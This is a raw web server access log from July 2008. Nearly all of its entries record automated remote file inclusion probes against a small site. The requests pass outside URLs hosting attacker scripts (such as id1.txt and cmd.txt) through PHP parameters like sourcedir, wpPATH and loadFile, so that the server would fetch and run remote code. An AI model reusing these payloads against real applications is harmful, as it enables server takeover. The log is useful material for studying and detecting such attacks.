200.11.67.242 - - [29/Jul/2008:11:05:11 -0700] "GET /logs/access_080313.log/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
75.125.143.162 - - [29/Jul/2008:11:05:12 -0700] "GET /logs/access_071225.log/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:11:05:12 -0700] "GET /logs/access_080313.log/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
75.125.143.162 - - [29/Jul/2008:11:05:12 -0700] "GET /logs/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:11:05:13 -0700] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 18369 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:11:05:14 -0700] "GET /logs/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 58281 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:11:05:15 -0700] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 18369 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:11:05:16 -0700] "GET /logs/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 58281 "-" "libwww-perl/5.65" "www.dmulk.com"
88.214.192.29 - - [29/Jul/2008:11:05:20 -0700] "GET /logs/access_080313.log/?sourcedir=http://www.geocities.com/lujonies/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.214.192.29 - - [29/Jul/2008:11:05:22 -0700] "GET /?sourcedir=http://www.geocities.com/lujonies/id2.txt??? HTTP/1.1" 200 18391 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:11:05:22 -0700] "GET /logs/access_080401.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
88.214.192.29 - - [29/Jul/2008:11:05:23 -0700] "GET /logs/?sourcedir=http://www.geocities.com/lujonies/id2.txt??? HTTP/1.1" 200 58281 "-" "libwww-perl/5.808" "www.dmulk.com"
213.246.46.202 - - [29/Jul/2008:11:05:25 -0700] "GET /logs/access_080207.log//Neos_Chronos/header.php?base_folder=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.46.202 - - [29/Jul/2008:11:05:25 -0700] "GET //Neos_Chronos/header.php?base_folder=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.46.202 - - [29/Jul/2008:11:05:25 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:11:05:28 -0700] "GET /logs/access_080219.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:11:05:32 -0700] "GET /logs/access_080401.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
201.130.79.130 - - [29/Jul/2008:11:05:36 -0700] "GET /logs/access_080218.log/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:11:05:37 -0700] "GET /logs/access_080309.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:11:05:38 -0700] "GET /logs/access_080219.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
160.99.12.231 - - [29/Jul/2008:11:05:39 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://genthal.com/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [29/Jul/2008:11:05:40 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://genthal.com/alba.txt??? HTTP/1.1" 200 18579 "-" "libwww-perl/5.65" "www.dmulk.com"
65.55.211.25 - - [29/Jul/2008:11:05:41 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
65.55.211.25 - - [29/Jul/2008:11:05:43 -0700] "GET /blog/index.php/2008/04/12/great-day-for-a-ride/feed/ HTTP/1.1" 304 1 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
72.9.145.107 - - [29/Jul/2008:11:05:44 -0700] "GET /logs/access_080310.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:11:05:47 -0700] "GET /logs/access_080201.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:11:05:48 -0700] "GET /logs/access_080309.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.106.191.163 - - [29/Jul/2008:11:05:52 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://susanita.de/tests/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.163 - - [29/Jul/2008:11:05:52 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://susanita.de/tests/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.163 - - [29/Jul/2008:11:05:54 -0700] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://susanita.de/tests/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:11:05:55 -0700] "GET /logs/access_080310.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.89.90 - - [29/Jul/2008:11:06:03 -0700] "GET /logs/access_080123.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.markus-wecker.de/mambots/search/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.213.245.1 - - [29/Jul/2008:11:06:05 -0700] "GET /logs/access_080315.log/lostpasswd.php?env[include_prefix]=http://inside-asia.com//templates/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:11:06:12 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:11:06:13 -0700] "GET //index.php?DOCUMENT_ROOT=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 200 18429 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
70.84.182.98 - - [29/Jul/2008:11:06:20 -0700] "GET /logs/access_080218.log/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
213.246.46.202 - - [29/Jul/2008:11:06:32 -0700] "GET /logs/access_080103.log//Neos_Chronos/header.php?base_folder=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.244.71.72 - - [29/Jul/2008:11:06:35 -0700] "GET /logs/?sourcedir=http://www.geocities.com/lujonies/id2.txt??? HTTP/1.1" 200 58281 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.186.5 - - [29/Jul/2008:11:06:38 -0700] "GET /logs/access_080313.log/?sourcedir=http://www.geocities.com/lujonies/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.244.71.72 - - [29/Jul/2008:11:06:39 -0700] "GET /?sourcedir=http://www.geocities.com/lujonies/id2.txt??? HTTP/1.1" 200 18407 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.186.5 - - [29/Jul/2008:11:06:41 -0700] "GET /?sourcedir=http://www.geocities.com/lujonies/id2.txt??? HTTP/1.1" 200 18407 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.186.5 - - [29/Jul/2008:11:06:42 -0700] "GET /logs/?sourcedir=http://www.geocities.com/lujonies/id2.txt??? HTTP/1.1" 200 58281 "-" "libwww-perl/5.65" "www.dmulk.com"
200.150.189.10 - - [29/Jul/2008:11:06:48 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.adoradores.kit.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:11:06:50 -0700] "GET /logs/access_080114.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:11:06:51 -0700] "GET /logs/access_080119.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
200.150.189.10 - - [29/Jul/2008:11:06:52 -0700] "GET /phphtml.php?htmlclass_path=http://www.adoradores.kit.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:11:06:58 -0700] "GET /logs/access_080201.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.213.245.215 - - [29/Jul/2008:11:07:00 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://server.classyhost.com/~pictures/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.215 - - [29/Jul/2008:11:07:02 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://server.classyhost.com/~pictures/safe.txt?? HTTP/1.1" 200 18621 "-" "libwww-perl/5.65" "www.dmulk.com"
69.10.47.15 - - [29/Jul/2008:11:07:03 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:11:07:03 -0700] "GET /logs/access_071231.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:11:07:04 -0700] "GET /logs/access_080218.log/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:11:07:06 -0700] "GET /logs/access_080306.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:11:07:08 -0700] "GET /logs/access_080325.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:11:07:13 -0700] "GET /logs/access_080218.log/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:11:07:17 -0700] "GET /logs/access_080201.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.150.189.10 - - [29/Jul/2008:11:07:19 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.adoradores.kit.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.150.189.10 - - [29/Jul/2008:11:07:20 -0700] "GET /phphtml.php?htmlclass_path=http://www.adoradores.kit.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.106.191.163 - - [29/Jul/2008:11:07:20 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://susanita.de/tests/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.163 - - [29/Jul/2008:11:07:21 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://susanita.de/tests/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.163 - - [29/Jul/2008:11:07:21 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://susanita.de/tests/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.163 - - [29/Jul/2008:11:07:21 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://susanita.de/tests/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.163 - - [29/Jul/2008:11:07:21 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://susanita.de/tests/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.163 - - [29/Jul/2008:11:07:22 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://susanita.de/tests/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.85.101.1 - - [29/Jul/2008:11:07:33 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.10.95 - - [29/Jul/2008:11:07:45 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.10.95 - - [29/Jul/2008:11:07:48 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:11:07:51 -0700] "GET /logs/access_080114.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:11:07:52 -0700] "GET /logs/access_080119.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.25.10.95 - - [29/Jul/2008:11:07:52 -0700] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.84.182.98 - - [29/Jul/2008:11:07:54 -0700] "GET /logs/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 58281 "-" "libwww-perl/5.810" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:11:07:55 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
70.84.182.98 - - [29/Jul/2008:11:07:55 -0700] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 18369 "-" "libwww-perl/5.810" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:11:07:56 -0700] "GET //index.php?DOCUMENT_ROOT=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 200 18429 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:11:07:57 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
201.130.79.130 - - [29/Jul/2008:11:08:02 -0700] "GET /logs/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 58281 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [29/Jul/2008:11:08:05 -0700] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 18369 "-" "libwww-perl/5.803" "www.dmulk.com"
70.84.182.98 - - [29/Jul/2008:11:08:06 -0700] "GET /logs/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 58281 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:11:08:09 -0700] "GET /logs/access_071231.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:11:08:09 -0700] "GET /logs/access_080114.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.182.98 - - [29/Jul/2008:11:08:09 -0700] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 18369 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:11:08:09 -0700] "GET /logs/access_080119.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:11:08:10 -0700] "GET /logs/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 58281 "-" "libwww-perl/5.65" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:11:08:10 -0700] "GET /logs/access_080306.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.244.71.72 - - [29/Jul/2008:11:08:11 -0700] "GET /logs/access_080313.log/?sourcedir=http://www.geocities.com/lujonies/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:11:08:13 -0700] "GET /logs/access_080325.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:11:08:13 -0700] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 18369 "-" "libwww-perl/5.65" "www.dmulk.com"
201.130.79.130 - - [29/Jul/2008:11:08:13 -0700] "GET /logs/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 58281 "-" "libwww-perl/5.803" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:11:08:13 -0700] "GET /logs/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 58281 "-" "libwww-perl/5.65" "www.dmulk.com"
81.0.228.184 - - [29/Jul/2008:11:08:14 -0700] "GET /logs/?sourcedir=http://www.geocities.com/lujonies/id2.txt??? HTTP/1.1" 200 58281 "-" "libwww-perl/5.805" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:11:08:14 -0700] "GET /logs/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 58281 "-" "libwww-perl/5.65" "www.dmulk.com"
62.244.71.72 - - [29/Jul/2008:11:08:14 -0700] "GET /?sourcedir=http://www.geocities.com/lujonies/id2.txt??? HTTP/1.1" 200 18407 "-" "libwww-perl/5.803" "www.dmulk.com"
62.244.71.72 - - [29/Jul/2008:11:08:15 -0700] "GET /logs/?sourcedir=http://www.geocities.com/lujonies/id2.txt??? HTTP/1.1" 200 58281 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [29/Jul/2008:11:08:16 -0700] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 18369 "-" "libwww-perl/5.803" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:11:08:17 -0700] "GET /logs/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 58281 "-" "libwww-perl/5.65" "www.dmulk.com"
77.87.191.61 - - [29/Jul/2008:11:08:17 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:11:08:17 -0700] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 18369 "-" "libwww-perl/5.65" "www.dmulk.com"
81.0.228.184 - - [29/Jul/2008:11:08:17 -0700] "GET /?sourcedir=http://www.geocities.com/lujonies/id2.txt??? HTTP/1.1" 200 18407 "-" "libwww-perl/5.805" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:11:08:17 -0700] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 18353 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:11:08:19 -0700] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 18369 "-" "libwww-perl/5.65" "www.dmulk.com"
77.87.191.61 - - [29/Jul/2008:11:08:20 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.246.46.202 - - [29/Jul/2008:11:08:23 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.87.191.61 - - [29/Jul/2008:11:08:23 -0700] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:11:08:25 -0700] "GET /logs/access_071231.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:11:08:26 -0700] "GET /logs/access_080306.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
141.85.101.1 - - [29/Jul/2008:11:08:27 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.85.101.1 - - [29/Jul/2008:11:08:28 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.85.101.1 - - [29/Jul/2008:11:08:29 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:11:08:29 -0700] "GET /logs/access_080325.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
141.85.101.1 - - [29/Jul/2008:11:08:29 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.214.192.29 - - [29/Jul/2008:11:08:31 -0700] "GET /logs/access_080313.log/?sourcedir=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.214.192.29 - - [29/Jul/2008:11:08:34 -0700] "GET /?sourcedir=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 200 18409 "-" "libwww-perl/5.808" "www.dmulk.com"
88.214.192.29 - - [29/Jul/2008:11:08:35 -0700] "GET /logs/?sourcedir=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 200 58281 "-" "libwww-perl/5.808" "www.dmulk.com"
70.84.182.98 - - [29/Jul/2008:11:09:02 -0700] "GET /logs/access_080218.log/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:11:09:08 -0700] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:11:09:08 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:11:09:08 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.213.245.1 - - [29/Jul/2008:11:09:09 -0700] "GET /logs/access_080315.log/lostpasswd.php?env[include_prefix]=http://inside-asia.com//templates/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.130.79.130 - - [29/Jul/2008:11:09:15 -0700] "GET /logs/access_080218.log/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.111.11.7 - - [29/Jul/2008:11:09:16 -0700] "GET /logs/access_080313.log/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.11.7 - - [29/Jul/2008:11:09:19 -0700] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 18369 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.11.7 - - [29/Jul/2008:11:09:22 -0700] "GET /logs/access.log/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
193.111.11.7 - - [29/Jul/2008:11:09:22 -0700] "GET /logs/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 58281 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.11.7 - - [29/Jul/2008:11:09:23 -0700] "GET /logs/access.log/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
193.111.11.7 - - [29/Jul/2008:11:09:31 -0700] "GET /logs/access_080313.log/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.11.7 - - [29/Jul/2008:11:09:35 -0700] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 18369 "-" "libwww-perl/5.805" "www.dmulk.com"
